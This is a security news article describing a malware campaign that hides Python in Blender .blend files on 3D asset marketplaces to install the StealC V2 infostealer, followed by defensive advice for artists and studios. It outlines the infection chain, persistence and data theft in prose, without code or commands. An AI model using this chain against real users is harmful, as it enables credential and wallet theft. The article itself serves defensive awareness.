Security researchers at Morphisec have identified a targeted malware campaign that abuses Blender, a popular open-source 3D creation suite, to deliver the StealC V2 infostealer. Attackers upload infected .blend project files to major 3D asset marketplaces such as CGTrader, putting freelance artists, studios, and production pipelines at risk whenever they download third‑party models.
How malicious Blender .blend files deliver StealC malware
Blender supports embedded Python scripts inside .blend files to automate workflows, create custom panels, manage rigs, and integrate with rendering pipelines. This extensibility is a core strength of the platform, but it also turns every complex project file into a potential container for executable code.
The key security control in this context is Blender’s “Auto Run” feature, which automatically executes embedded Python code when a .blend file is opened. Many artists enable Auto Run for convenience, so rigs, UI tools, and drivers load instantly. However, once Auto Run is enabled, opening a project from an untrusted source effectively becomes equivalent to running an unknown program.
In the campaign observed by Morphisec, attackers weaponize this feature using malicious .blend files containing hidden Python code. When the victim opens the project, the script silently connects to a domain hosted on Cloudflare Workers and downloads an intermediate loader. This loader then retrieves a PowerShell script, which in turn downloads two ZIP archives named ZalypaGyliveraV1 and BLENDERX from the attackers’ infrastructure.
The archives are extracted into the Windows %TEMP% directory. The script then creates LNK shortcut files in the Startup folder to achieve persistence, ensuring the malware runs whenever the operating system boots. Finally, the chain deploys two payloads: the primary StealC V2 infostealer and an additional Python-based stealer that acts as a redundant data theft channel should the main binary be disrupted.
StealC V2 infostealer: capabilities, evolution, and evasion
The campaign uses a recent build of StealC V2, previously analyzed by researchers at Zscaler and other vendors. StealC belongs to a class of information-stealing malware designed to harvest sensitive data from compromised systems and exfiltrate it to attacker-controlled servers.
Current variants of StealC V2 include modules aimed at collecting a broad set of data, including browser credentials and cookies, saved passwords and autofill data, session tokens, information from local cryptocurrency wallets and browser wallet extensions, and, potentially, tokens from messaging and productivity applications. Such data enables account takeover, financial theft, and deeper compromise of corporate networks.
StealC V2 also implements an updated User Account Control (UAC) bypass mechanism, making it easier for the malware to perform high‑privilege operations without user confirmation. By combining stealthy installation, aggressive data collection, and privilege escalation, StealC presents a significant threat both to individual creators and to enterprise environments that rely on 3D tools.
Low detection rates and advanced antivirus evasion
Although StealC was first documented in 2023, the malware family is under active development, with frequent updates that complicate detection. According to Morphisec, the sample analyzed in this Blender campaign was undetected by all products on VirusTotal at the time of investigation. This indicates extensive use of techniques such as code obfuscation, dynamic loading of components, and minimizing overtly malicious behavior until data exfiltration is triggered.
Why 3D assets and Blender projects must be treated as executable content
The most concerning aspect of this campaign is the use of 3D assets as an attack vector. Marketplaces like CGTrader typically validate visual quality and licensing, but they lack the ability to reliably inspect or sandbox all embedded Python scripts in .blend files before publication. As a result, even high-quality, legitimate-looking assets can conceal malicious logic.
From a security standpoint, any file format that supports scripting or macros—including Office documents, Adobe project files, and Blender scenes—should be regarded as potentially executable code. The security of these assets hinges on the trustworthiness of the author and the precautions taken by the end user, not just on the visual content.
Security recommendations for Blender users, 3D artists, and studios
1. Disable Auto Run by default. Keep Blender’s automatic Python execution turned off and only enable it for internally created projects or assets from thoroughly vetted vendors. Treat enabling Auto Run for an external file as equivalent to running an unknown application.
2. Use isolated environments for third‑party assets. Open downloaded .blend files from marketplaces in a virtual machine, container, or dedicated workstation that is isolated from production networks and sensitive data. This is particularly important for studios with shared asset libraries and render farms.
3. Inspect projects for embedded scripts and network activity. When in doubt, review a project’s text blocks, add-ons, and handlers for unfamiliar Python code. Any unexpected outbound network requests triggered by a Blender file should be treated as a serious warning sign and investigated immediately.
4. Restrict PowerShell and monitor endpoint behavior. In corporate environments, apply Group Policy, AppLocker, or similar controls to limit unsupervised PowerShell execution. Complement this with EDR solutions that can detect anomalous scripting activity, persistence mechanisms such as suspicious LNK files, and connections to unusual external infrastructure.
5. Train creative teams on supply-chain threats. 3D artists, technical directors, and pipeline engineers should understand that downloaded models can function as malware carriers. Security awareness programs for creative teams should cover safe asset sourcing, sandboxing workflows, and the specific risks of Auto Run and scripting.
The StealC V2 campaign delivered through Blender underscores a broader trend: any widely used creative or production tool can become a high‑value target for attackers. Treating complex project files as active content, hardening default configurations, and isolating untrusted assets are now essential elements of a secure 3D workflow. Organizations that proactively integrate these practices into their pipelines will be far better positioned to prevent a seemingly harmless 3D model from becoming the initial foothold for a full‑scale compromise.
